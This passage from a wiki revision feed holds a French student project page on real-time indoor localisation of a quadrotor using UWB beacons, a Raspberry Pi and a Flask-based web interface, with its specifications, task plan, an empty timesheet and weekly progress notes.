Le contrôle de ceux-ci passe tout d'abord par la maîtrise de leur position dans l'espace. Le développement des applications liées à l'utilisation de drones nécessite un travail important sur la localisation spatiale d'objets connectés. &lt;br /&gt;
&lt;br /&gt;
De plus, dans un souci d'utilisation, il est essentiel de développer des interfaces logicielles permettant d'exploiter ces données.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Objectif du projet&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
L'objectif de ce projet est de développer une interface logicielle permettant de traiter en temps réel les informations de localisation d'un drone et de balises, dans le but de définir leur localisation dans l'espace, en intérieur.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Description du projet&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Pour réaliser le contrôle de drones, la première étape importante est de donner ses informations de position. Le but du projet est de développer une interface logicielle permettant de localiser le drone en temps réel en intérieur. Le drone se déplace dans un environnement dans lequel ont été installées de multiples balises. Il est équipé d'une carte, lui permettant de recevoir les distances relatives entre lui-même et les balises, sur laquelle différents algorithmes vont être implémentés pour effectuer la localisation en temps réel. Le projet requiert des compétences en développement hardware (Crazyflie 2.0, voir https://wiki.bitcraze.io/) et software (langage C/C++/Python/Javascript/HTML...).&lt;br /&gt;
&lt;br /&gt;
Il se divise en 4 étapes principales, qui sont:&lt;br /&gt;
*1) Choisir les technologies utilisées&lt;br /&gt;
*2) Choisir l'architecture (OS / APIs)&lt;br /&gt;
*3) Développer les différentes parties du projet&lt;br /&gt;
*4) Intégrer et connecter les différentes parties du projet&lt;br /&gt;
&lt;br /&gt;
La localisation étant en intérieur, le protocole GPS n'est donc pas assez précis pour les applications ciblées. La mise en place d'un tel dispositif permettrait grâce à l'utilisation d'un algorithme d'estimer avec une bonne précision les positions en intérieur d'une balise centrale (appelée Tag) et de balises (appelées Anchor). Le Tag scanne en temps réel la distance relative aux différentes balises, et il nous est retourné la position des balises et du Tag grâce à l'algorithme de localisation.&lt;br /&gt;
&lt;br /&gt;
Le projet se compose de 3 parties:&lt;br /&gt;
* Collect &amp;amp; parse: collecter les données envoyées par les balises en communiquant avec un serveur et récupérer les données adéquates par un tri&lt;br /&gt;
* Localise: déterminer la matrice de position des balises et du Tag en traitant les données récupérées&lt;br /&gt;
* Display: développer l'interface homme machine pour afficher, étudier et utiliser les données traitées&lt;br /&gt;
&lt;br /&gt;
Nous travaillerons dans un premier temps dans une optique temps différé avant de travailler en temps réel. Cela nous permettra d'acquérir des données utiles et réutilisables en aval. &lt;br /&gt;
&lt;br /&gt;
A l'aboutissement du projet, nous devrions être capable via l'interface homme machine développée d'afficher précisément la position spatiale des balises ainsi que du Tag, grâce àl'utilisation d'un algorithme de localisation et des données récupérées, et d'afficher d'autres données relatives au déplacement du Tag ou des balises dans l'espace. &lt;br /&gt;
&lt;br /&gt;
Si le temps le permet, nous pourrons aussi être amenés à adapter et utiliser l'interface développée pour l'utilisation d'un drone.&lt;br /&gt;
&lt;br /&gt;
''Sujet originel''&lt;br /&gt;
&lt;br /&gt;
To achieve the control of quadrotors, the first important task to give its position information. This project is to develop a software(GUI) to localize the quadrotors in real-time. The quadrotor is flying in an environment where several transmitters have been installed. The quadrotor is equipped with a deck to receive the relative distances between the deck and all transmitters, based on which different algorithms will be implemented to realize the real-time localization. The candidates need to have both experiences on hardware (Crazyflie 2.0, see https://wiki.bitcraze.io/) and software development (C/C , Python…). &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Calendrier&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
''[[Avant le 29/09/17]]'' - Élaboration du Cahier des charges, de la liste des tâches et du calendrier prévisionnel&lt;br /&gt;
&lt;br /&gt;
''[[Avant fin Octobre]]'' - Serveur de collecte et début du développement de l'interface logicielle&lt;br /&gt;
&lt;br /&gt;
''[[Avant fin Décembre]]'' - Interface logicielle&lt;br /&gt;
&lt;br /&gt;
''[[A la fin du PFE]]'' - Intégration finale des différentes parties (Serveur de collecte des données &amp;amp; Serveur de localisation &amp;amp; Interface logicielle)&lt;br /&gt;
&lt;br /&gt;
Répartition du volume de travail (***h):&lt;br /&gt;
&lt;br /&gt;
* Recherche sur les technologies à utiliser (**h)&lt;br /&gt;
* Développement du serveur de collecte de données (**h)&lt;br /&gt;
* Réalisation de l'interface logicielle (Web//Logiciel/Application) (**h)&lt;br /&gt;
* Intégration des différentes parties (**h)&lt;br /&gt;
* Test et débuggage (**h)&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Choix techniques : matériel et logiciel&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Afin de développer ce dispositif, nous allons utiliser une Raspberry Pi 3 associée à une carte réceptrice, qui communique avec 4 balises composées chacune d'un microcontrôleur et d'une carte émettrice radio (UWB5C) et alimentées par batteries. La carte réceptrice joue le rôle du drone à localiser et communiquera les données émises par les balises vers l'ordinateur via Bluetooth.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Choix technologiques&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Voici les technologies que nous utilisons pour chacune des parties de ce projet.&lt;br /&gt;
&lt;br /&gt;
    1) Serveur de collecte des données:&lt;br /&gt;
       Scanne et parse les données récupérées pour fournir la matrice D des distances relatives du tag aux 4 balises&lt;br /&gt;
        - API&lt;br /&gt;
        - Python&lt;br /&gt;
&lt;br /&gt;
    2) Serveur de localisation (fourni):&lt;br /&gt;
       Calcule grâce à l'algorithme de localisation et la matrice D les positions spatiales des 4 noeuds et du tag&lt;br /&gt;
        - API&lt;br /&gt;
        - Bootstrap&lt;br /&gt;
        - Jquery&lt;br /&gt;
        - Python&lt;br /&gt;
&lt;br /&gt;
    3) Interface utilisateur:&lt;br /&gt;
       Affiche courbes, visualisation 3D, boutons ou données des fichiers envoyées par le serveur de localisation&lt;br /&gt;
        - HTML5 / Javascript&lt;br /&gt;
        - Fichiers JSON (serveurs de collecte et de localisation)&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Calendrier prévisionnel'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Liste des tâches à effectuer&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
# Se documenter sur le projet&lt;br /&gt;
##Langages et technologies utilisées&lt;br /&gt;
##Matériel utilisé&lt;br /&gt;
##Mettre en place du travail sur le Git&lt;br /&gt;
# Réaliser le serveur de collecte&lt;br /&gt;
##Récupérer les trames envoyées par bluetooth par le TAG via la Raspberry Pi&lt;br /&gt;
##Intégrer le serveur de localisation pour interpréter les trames&lt;br /&gt;
##Tester et optimiser&lt;br /&gt;
# Réaliser l'interface Web utilisateur&lt;br /&gt;
##Implémenter le serveur de collecte et de localisation&lt;br /&gt;
##Afficher et traiter les données stockées dans les fichiers JSON via le serveur (temps différé + temps réel)&lt;br /&gt;
##Tester et optimiser&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Feuille d'heures'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
!Tâche !! Prélude !! Heures S1 !! Heures S2 !! Heures S3 !! Heures S4 !! Heures S5 !! Heures S6 !! Heures S7 !! Heures S8 !! Heures S9 !! Heures S10 !! Heures S11 !! Heures S12 !! Après Noël !! Total&lt;br /&gt;
|-&lt;br /&gt;
| Cahier des charges / Wiki / Gitlab&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| Documentation sur les technos utilisées&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| Documentation sur le matériel&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| Recherche et développement du serveur de collecte&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| Recherche et développement de l'interface Web&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| Recherche et intégration du serveur de localisation&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| Intégration des différentes parties&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| Tests et débuggage&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| Optimisation/Correction des programmes&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Avancement du Projet'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Phase préparatoire'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
''[[Jeu 21/09/17 - Ven 22/09/17]]'' &lt;br /&gt;
*Rendez-vous de mise au point du cahier des charges avec les encadrants/intervenants (M. ZHENG Gang et M. DAGHER Roudy)&lt;br /&gt;
*Elaboration du cahier des charges&lt;br /&gt;
*Elaboration de la page Wiki (préparation de la mise en page et présentation du sujet)&lt;br /&gt;
*Préparation du travail sous forme de Mind Map&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Semaine 1'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
''[[Jeu 28/09/17 - Ven 29/09/17]]'' &lt;br /&gt;
*Revue du Cahier des Charges avec les encadrants&lt;br /&gt;
*Lecture et recherches sur les technologies adaptées&lt;br /&gt;
*Construction de la suite de la Mind Map&lt;br /&gt;
*Création du Gitlab&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Semaine 2'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
''[[Jeu 05/10/17 - Ven 06/10/17]]''  &lt;br /&gt;
*Précisions sur le cahier des charges&lt;br /&gt;
*Listage du matériel&lt;br /&gt;
*Recherche et détermination de solutions technologiques possibles pour les fonctions demandées&lt;br /&gt;
*Début du travail sur le serveur de collecte&lt;br /&gt;
*Apprentissage du langage Python et de l'utilisation du framework Flask&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Semaine 3'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
''[[Mer 11/10/17 - Jeu 12/10/17]]''  &lt;br /&gt;
*Recherche et développement initial du serveur de collecte de données&lt;br /&gt;
*Complément du Git sur les tâches à effectuer&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons commencé à créer un serveur flask renvoyant pour l'instant une matrice aléatoire. Lors de la requete URL &amp;quot;../matrice&amp;quot;, nous voyons bien une matrice aléatoire apparaitre sur la page WEB. Nous essayons de nous connecter à la Raspberry pi en redirigeant sont port série vers le Bluetooth de façon à récupérer de vrai matrices de distance entre le drone et les balises. Nous pourrons afficher ensuite ces matrices ou alors les stocker dans un fichier en attendant le traitement de celle ci.&lt;br /&gt;
[[Fichier:Requete s3.PNG|300px|right|serveur flask]]&lt;br /&gt;
Nous avons plusieurs problème avec le Bluetooth pour se connecter avec la Raspberry pi. Quand nous aurons réussi à nous connecter au port série de la Raspberry pi alors nous pour gérer le traitement des données récupérées.&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Semaine 4'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
''[[Jeu 19/10/17 - Ven 20/10/17]]''  &lt;br /&gt;
*&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Semaine 5'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
''[[Jeu 26/10/17 - Ven 27/10/17]]''  &lt;br /&gt;
*&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=P18_Localisation_of_quadrotors&amp;diff=45697</id>
		<title>P18 Localisation of quadrotors</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=P18_Localisation_of_quadrotors&amp;diff=45697"/>
				<updated>2017-10-18T09:21:24Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : /* Semaine 3 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Cahier des charges'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Présentation générale du projet&amp;lt;/span&amp;gt;=== &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Contexte&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Dans un monde de plus en plus connecté, de nombreux drones sont déployés pour diverses applications comme l'espionnage, la surveillance, la cartographie de lieux et la livraison de colis. Les technologies nécessaires pour contrôler ces drones sont des sujets de recherche actuels. &lt;br /&gt;
&lt;br /&gt;
Le contrôle de ceux-ci passe tout d'abord par la maîtrise de leur position dans l'espace. Le développement des applications liées à l'utilisation de drones nécessite un travail important sur la localisation spatiale d'objets connectés. &lt;br /&gt;
&lt;br /&gt;
De plus, dans un souci d'utilisation, il est essentiel de développer des interfaces logicielles permettant d'exploiter ces données.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Objectif du projet&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
L'objectif de ce projet est de développer une interface logicielle permettant de traiter en temps réel les informations de localisation d'un drone et de balises, dans le but de définir leur localisation dans l'espace, en intérieur.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Description du projet&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Pour réaliser le contrôle de drones, la première étape importante est de donner ses informations de position. Le but du projet est de développer une interface logicielle permettant de localiser le drone en temps réel en intérieur. Le drone se déplace dans un environnement dans lequel ont été installées de multiples balises. Il est équipé d'une carte, lui permettant de recevoir les distances relatives entre lui-même et les balises, sur laquelle différents algorithmes vont être implémentés pour effectuer la localisation en temps réel. Le projet requiert des compétences en développement hardware (Crazyflie 2.0, voir https://wiki.bitcraze.io/) et software (langage C/C++/Python/Javascript/HTML...).&lt;br /&gt;
&lt;br /&gt;
Il se divise en 4 étapes principales, qui sont:&lt;br /&gt;
*1) Choisir les technologies utilisées&lt;br /&gt;
*2) Choisir l'architecture (OS / APIs)&lt;br /&gt;
*3) Développer les différentes parties du projet&lt;br /&gt;
*4) Intégrer et connecter les différentes parties du projet&lt;br /&gt;
&lt;br /&gt;
La localisation étant en intérieur, le protocole GPS n'est donc pas assez précis pour les applications ciblées. La mise en place d'un tel dispositif permettrait grâce à l'utilisation d'un algorithme d'estimer avec une bonne précision les positions en intérieur d'une balise centrale (appelée Tag) et de balises (appelées Anchor). Le Tag scanne en temps réel la distance relative aux différentes balises, et il nous est retourné la position des balises et du Tag grâce à l'algorithme de localisation.&lt;br /&gt;
&lt;br /&gt;
Le projet se compose de 3 parties:&lt;br /&gt;
* Collect &amp;amp; parse: collecter les données envoyées par les balises en communiquant avec un serveur et récupérer les données adéquates par un tri&lt;br /&gt;
* Localise: déterminer la matrice de position des balises et du Tag en traitant les données récupérées&lt;br /&gt;
* Display: développer l'interface homme machine pour afficher, étudier et utiliser les données traitées&lt;br /&gt;
&lt;br /&gt;
Nous travaillerons dans un premier temps dans une optique temps différé avant de travailler en temps réel. Cela nous permettra d'acquérir des données utiles et réutilisables en aval. &lt;br /&gt;
&lt;br /&gt;
A l'aboutissement du projet, nous devrions être capable via l'interface homme machine développée d'afficher précisément la position spatiale des balises ainsi que du Tag, grâce àl'utilisation d'un algorithme de localisation et des données récupérées, et d'afficher d'autres données relatives au déplacement du Tag ou des balises dans l'espace. &lt;br /&gt;
&lt;br /&gt;
Si le temps le permet, nous pourrons aussi être amenés à adapter et utiliser l'interface développée pour l'utilisation d'un drone.&lt;br /&gt;
&lt;br /&gt;
''Sujet originel''&lt;br /&gt;
&lt;br /&gt;
To achieve the control of quadrotors, the first important task to give its position information. This project is to develop a software(GUI) to localize the quadrotors in real-time. The quadrotor is flying in an environment where several transmitters have been installed. The quadrotor is equipped with a deck to receive the relative distances between the deck and all transmitters, based on which different algorithms will be implemented to realize the real-time localization. The candidates need to have both experiences on hardware (Crazyflie 2.0, see https://wiki.bitcraze.io/) and software development (C/C , Python…). &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Calendrier&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
''[[Avant le 29/09/17]]'' - Élaboration du Cahier des charges, de la liste des tâches et du calendrier prévisionnel&lt;br /&gt;
&lt;br /&gt;
''[[Avant fin Octobre]]'' - Serveur de collecte et début du développement de l'interface logicielle&lt;br /&gt;
&lt;br /&gt;
''[[Avant fin Décembre]]'' - Interface logicielle&lt;br /&gt;
&lt;br /&gt;
''[[A la fin du PFE]]'' - Intégration finale des différentes parties (Serveur de collecte des données &amp;amp; Serveur de localisation &amp;amp; Interface logicielle)&lt;br /&gt;
&lt;br /&gt;
Répartition du volume de travail (***h):&lt;br /&gt;
&lt;br /&gt;
* Recherche sur les technologies à utiliser (**h)&lt;br /&gt;
* Développement du serveur de collecte de données (**h)&lt;br /&gt;
* Réalisation de l'interface logicielle (Web//Logiciel/Application) (**h)&lt;br /&gt;
* Intégration des différentes parties (**h)&lt;br /&gt;
* Test et débuggage (**h)&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Choix techniques : matériel et logiciel&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Afin de développer ce dispositif, nous allons utiliser une Raspberry Pi 3 associée à une carte réceptrice, qui communique avec 4 balises composées chacune d'un microcontrôleur et d'une carte émettrice radio (UWB5C) et alimentées par batteries. La carte réceptrice joue le rôle du drone à localiser et communiquera les données émises par les balises vers l'ordinateur via Bluetooth.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Choix technologiques&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Voici les technologies que nous utilisons pour chacune des parties de ce projet.&lt;br /&gt;
&lt;br /&gt;
    1) Serveur de collecte des données:&lt;br /&gt;
       Scanne et parse les données récupérées pour fournir la matrice D des distances relatives du tag aux 4 balises&lt;br /&gt;
        - API&lt;br /&gt;
        - Python&lt;br /&gt;
&lt;br /&gt;
    2) Serveur de localisation (fourni):&lt;br /&gt;
       Calcule grâce à l'algorithme de localisation et la matrice D les positions spatiales des 4 noeuds et du tag&lt;br /&gt;
        - API&lt;br /&gt;
        - Bootstrap&lt;br /&gt;
        - Jquery&lt;br /&gt;
        - Python&lt;br /&gt;
&lt;br /&gt;
    3) Interface utilisateur:&lt;br /&gt;
       Affiche courbes, visualisation 3D, boutons ou données des fichiers envoyées par le serveur de localisation&lt;br /&gt;
        - HTML5 / Javascript&lt;br /&gt;
        - Fichiers JSON (serveurs de collecte et de localisation)&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Calendrier prévisionnel'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Liste des tâches à effectuer&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
# Se documenter sur le projet&lt;br /&gt;
##Langages et technologies utilisées&lt;br /&gt;
##Matériel utilisé&lt;br /&gt;
##Mettre en place du travail sur le Git&lt;br /&gt;
# Réaliser le serveur de collecte&lt;br /&gt;
##Récupérer les trames envoyées par bluetooth par le TAG via la Raspberry Pi&lt;br /&gt;
##Intégrer le serveur de localisation pour interpréter les trames&lt;br /&gt;
##Tester et optimiser&lt;br /&gt;
# Réaliser l'interface Web utilisateur&lt;br /&gt;
##Implémenter le serveur de collecte et de localisation&lt;br /&gt;
##Afficher et traiter les données stockées dans les fichiers JSON via le serveur (temps différé + temps réel)&lt;br /&gt;
##Tester et optimiser&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Feuille d'heures'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
!Tâche !! Prélude !! Heures S1 !! Heures S2 !! Heures S3 !! Heures S4 !! Heures S5 !! Heures S6 !! Heures S7 !! Heures S8 !! Heures S9 !! Heures S10 !! Heures S11 !! Heures S12 !! Après Noël !! Total&lt;br /&gt;
|-&lt;br /&gt;
| Cahier des charges / Wiki / Gitlab&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| Documentation sur les technos utilisées&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| Documentation sur le matériel&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| Recherche et développement du serveur de collecte&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| Recherche et développement de l'interface Web&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| Recherche et intégration du serveur de localisation&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| Intégration des différentes parties&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| Tests et débuggage&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| Optimisation/Correction des programmes&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
